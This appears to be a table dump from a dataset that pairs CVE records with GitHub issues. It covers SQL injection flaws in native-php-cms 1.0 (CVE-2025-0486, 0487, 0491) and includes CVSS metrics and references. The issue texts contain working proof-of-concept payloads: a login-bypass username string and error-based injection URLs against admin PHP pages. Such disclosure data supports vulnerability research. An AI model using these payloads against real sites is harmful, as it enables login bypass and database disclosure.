cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2025-0486 | 2025-01-15T21:15:14.960 | A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /fladmin/login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/8"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/8#issue-2769942639"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.291931"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.291931"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.475249"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fanli2012:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC6224D5-0DC6-4449-9621-E63E6FBE9F5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/8#issue-2769942639 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | Unfiltered input username value in fladmin/login.php allows attackers to construct malicious usernames to bypass login

http://192.168.0.104/fladmin/login.php
Fill in the username field:`-1') OR 1=1#`
Password is arbitrary, you can also fill in 1

 | There is a universal password for native-php-cms | https://api.github.com/repos/Fanli2012/native-php-cms/issues/8/comments | 0 | 2025-01-06T06:35:01Z | 2025-01-06T06:39:03Z | https://github.com/Fanli2012/native-php-cms/issues/8 | 2,769,942,639 | 8 | 6,501 |
CVE-2025-0487 | 2025-01-15T21:15:15.160 | A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /fladmin/cat_edit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/9#issue-2769962332"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.291932"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.291932"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.475254"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fanli2012:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC6224D5-0DC6-4449-9621-E63E6FBE9F5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/9 | [
"Exploit"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | The input id parameter is not filtered in fladmin/cat_edit.php, resulting in error injection. Attackers can directly inject some data

No login required:http://192.168.0.104/fladmin/cat_edit.php?id=extractvalue(1,concat(0x5c,user(),0x5c))
 | fladmin/cat_edit.php SQL injection | https://api.github.com/repos/Fanli2012/native-php-cms/issues/9/comments | 0 | 2025-01-06T06:48:34Z | 2025-01-06T06:48:34Z | https://github.com/Fanli2012/native-php-cms/issues/9 | 2,769,962,332 | 9 | 6,502 |
CVE-2025-0487 | 2025-01-15T21:15:15.160 | A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /fladmin/cat_edit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/9#issue-2769962332"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.291932"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.291932"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.475254"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fanli2012:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC6224D5-0DC6-4449-9621-E63E6FBE9F5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/9#issue-2769962332 | [
"Exploit"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | The input id parameter is not filtered in fladmin/cat_edit.php, resulting in error injection. Attackers can directly inject some data

No login required:http://192.168.0.104/fladmin/cat_edit.php?id=extractvalue(1,concat(0x5c,user(),0x5c))
 | fladmin/cat_edit.php SQL injection | https://api.github.com/repos/Fanli2012/native-php-cms/issues/9/comments | 0 | 2025-01-06T06:48:34Z | 2025-01-06T06:48:34Z | https://github.com/Fanli2012/native-php-cms/issues/9 | 2,769,962,332 | 9 | 6,503 |
CVE-2025-0491 | 2025-01-15T22:15:26.990 | A vulnerability, which was classified as critical, was found in Fanli2012 native-php-cms 1.0. Affected is an unknown function of the file /fladmin/cat_dodel.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/13"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/13#issue-2770022466"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.291936"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.291936"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.475260"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fanli2012:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC6224D5-0DC6-4449-9621-E63E6FBE9F5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/13 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | Failure to filter the input id parameter value in fladmin/cat_dodel.php results in error injection, allowing attackers to directly inject some data

http://192.168.0.104/fladmin/cat_dodel.php?id=extractvalue(1,concat(0x5c,user(),0x5c))
 | fladmin/cat_dodel.php SQL injection | https://api.github.com/repos/Fanli2012/native-php-cms/issues/13/comments | 0 | 2025-01-06T07:27:37Z | 2025-01-06T07:27:37Z | https://github.com/Fanli2012/native-php-cms/issues/13 | 2,770,022,466 | 13 | 6,504 |
CVE-2025-0491 | 2025-01-15T22:15:26.990 | A vulnerability, which was classified as critical, was found in Fanli2012 native-php-cms 1.0. Affected is an unknown function of the file /fladmin/cat_dodel.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/13"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Fanli2012/native-php-cms/issues/13#issue-2770022466"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.291936"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.291936"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.475260"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fanli2012:native-php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC6224D5-0DC6-4449-9621-E63E6FBE9F5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Fanli2012/native-php-cms/issues/13#issue-2770022466 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Fanli2012",
"native-php-cms"
] | Failure to filter the input id parameter value in fladmin/cat_dodel.php results in error injection, allowing attackers to directly inject some data

http://192.168.0.104/fladmin/cat_dodel.php?id=extractvalue(1,concat(0x5c,user(),0x5c))
 | fladmin/cat_dodel.php SQL injection | https://api.github.com/repos/Fanli2012/native-php-cms/issues/13/comments | 0 | 2025-01-06T07:27:37Z | 2025-01-06T07:27:37Z | https://github.com/Fanli2012/native-php-cms/issues/13 | 2,770,022,466 | 13 | 6,505 |
